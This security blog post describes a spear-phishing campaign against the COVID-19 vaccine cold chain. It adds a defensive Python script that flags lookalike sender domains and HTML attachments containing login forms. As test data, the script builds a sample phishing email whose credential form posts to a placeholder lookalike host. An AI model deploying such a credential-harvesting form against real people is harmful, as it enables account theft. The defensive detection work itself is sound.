Supply chains are desirable targets for cybercriminals
Before the world was able to roll out vaccines to its citizens, the cold chain delivery system was under covert attack by spear-phishing, most likely carried out by nation-state actors.
What is a Cold Chain?
A cold chain is precisely what it sounds like: a supply chain used to transport temperature-sensitive products from location to location while preserving their quality within a controlled low-temperature range. This method is used most often for medical products such as medicines or vaccines.
Why Target Cold Chains?
Supply chains are desirable targets for cybercriminals because of the many entities involved in producing and transporting sensitive products. With a global health crisis like the one ushered in by the COVID-19 pandemic, the cold chain involved in transporting vaccines internationally is an especially tempting target.
While most people are familiar with mass phishing campaigns, which are usually easy to spot, spear-phishing is much more elaborate and far more high profile. Such a campaign requires extensive research on individuals with authority who can be impersonated to obtain sensitive information. Threat actors research names and roles within a company, targeting CEOs, global sales officers, purchasing managers, system administrators, sales reps, heads of marketing, and so on, often with the goal of infecting devices with malware or extracting information or money from individuals. In the case of the COVID-19 vaccine cold chain spear-phishing campaign, the attackers are attempting to steal credentials in order to gain access to privileged information.
When Did it Start?
With the first spear-phishing emails spotted in early September, before the vaccine was approved for administration, officials and employees at targeted organizations have been warned to double-check every new email they receive. The specific campaign in question impersonates an executive from Haier Biomedical, which is currently the world’s only complete cold chain provider.
The emails ask for price quotes regarding service contracts. They carry HTML attachments that open locally in the recipient's browser and present a login form, requiring recipients to enter credentials before the file can be viewed; those credentials are what the attackers are after. Addressing the possible motive behind the attack, Emsisoft threat analyst Brett Callow stated: “Disrupting the distribution of vaccines – and delaying getting them into people’s arms – could potentially provide the criminals with an enormous payday…” This gives us good insight into the political consequences that await the end targets of these attacks.
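The two signals described above (a sender posing as a trusted vendor, and an HTML attachment that renders a credential form locally) are both checkable at the mail gateway before a message reaches a purchasing manager's inbox. The following script is an added example written for this post, not code from the article or from any of the organisations it names; every vendor name, domain, address and the sample message itself are constructed placeholders. It builds one such message with Python's standard `email` library, parses it back as a gateway would, and returns a list of findings.

```python
"""Added example: triage an inbound message for a sender impersonating a
trusted vendor and for an HTML attachment that asks for credentials.
All vendor names, domains and addresses below are constructed placeholders."""
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed allow-list (assumption): a vendor's display name, lower-cased,
# mapped to the domains that vendor is actually known to send from.
TRUSTED_VENDORS = {"vendor example": {"vendor-example.test"}}

PASSWORD_INPUT = re.compile(r"<input[^>]*\btype\s*=\s*['\"]?password\b", re.I)
FORM_ACTION = re.compile(r"<form[^>]*\baction\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def build_sample_message() -> bytes:
    """Constructed sample: a quotation request carrying a local HTML login page."""
    msg = EmailMessage()
    msg["From"] = "Vendor Example Sales <sales@vendor-example-secure.biz>"
    msg["To"] = "purchasing@coldchain-customer.test"
    msg["Subject"] = "Request for quotation - service contract"
    msg.set_content("Please open the attached quotation request and confirm pricing.")
    html = "\n".join([
        "<html><body><p>Sign in to view the quotation request.</p>",
        '<form method="post" action="https://docs.vendor-example-secure.biz/collect">',
        '<input type="email" name="user">',
        '<input type="password" name="pass">',
        '<input type="submit" value="View document">',
        "</form></body></html>",
    ])
    msg.add_attachment(html, subtype="html", filename="Quotation_Request.html")
    return msg.as_bytes()


def check_sender(msg: EmailMessage) -> list[str]:
    """Flag a display name that borrows a trusted vendor's name while the
    address domain is not one of that vendor's known domains, and flag
    lookalike domains that reuse the vendor's registered label."""
    findings = []
    name, addr = parseaddr(msg["From"] or "")
    domain = addr.rpartition("@")[2].lower()
    for vendor, domains in TRUSTED_VENDORS.items():
        if domain in domains:
            continue  # genuine sending domain, nothing to flag for this vendor
        if vendor in name.lower():
            findings.append(f"display name claims '{vendor}' but domain {domain!r} is not known for it")
        label = next(iter(domains)).split(".")[0]  # e.g. "vendor-example"
        if label in domain:
            findings.append(f"lookalike domain {domain!r} reuses vendor label '{label}'")
    return findings


def check_attachments(msg: EmailMessage) -> list[str]:
    """Flag HTML attachments that render a credential form when opened locally."""
    findings = []
    for part in msg.iter_attachments():
        fname = part.get_filename() or "<unnamed>"
        is_html = part.get_content_type() == "text/html" or fname.lower().endswith((".html", ".htm"))
        if not is_html:
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # non-text MIME type with an .html name
            body = body.decode("utf-8", "replace")
        if PASSWORD_INPUT.search(body):
            findings.append(f"attachment {fname!r} contains a password field")
        for action in FORM_ACTION.findall(body):
            host = (urlparse(action).hostname or "").lower()
            findings.append(f"attachment {fname!r} posts form data to {host or 'a relative target'}")
    return findings


def triage(raw: bytes) -> list[str]:
    """Parse a raw RFC 5322 message and return all findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return check_sender(msg) + check_attachments(msg)


if __name__ == "__main__":
    for finding in triage(build_sample_message()):
        print("FLAG:", finding)
```

The attachment check deliberately runs on the raw HTML rather than rendering it: a form whose `action` points at a host outside the organisation, or any `<input type="password">` inside an attachment at all, is enough to quarantine the message for review, since a legitimate quotation request has no reason to ask for a login. The sender check catches the mismatch between the borrowed display name and the actual sending domain that the campaign relies on.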
The most immediate defence available is caution on the part of the individuals involved in the cold chain delivery process: treating unexpected requests for quotes, and any attachment that asks for a login, with suspicion even when the sender appears to be a known partner. This highlights the need for the general population to scrutinize emails that arrive under a trusted name.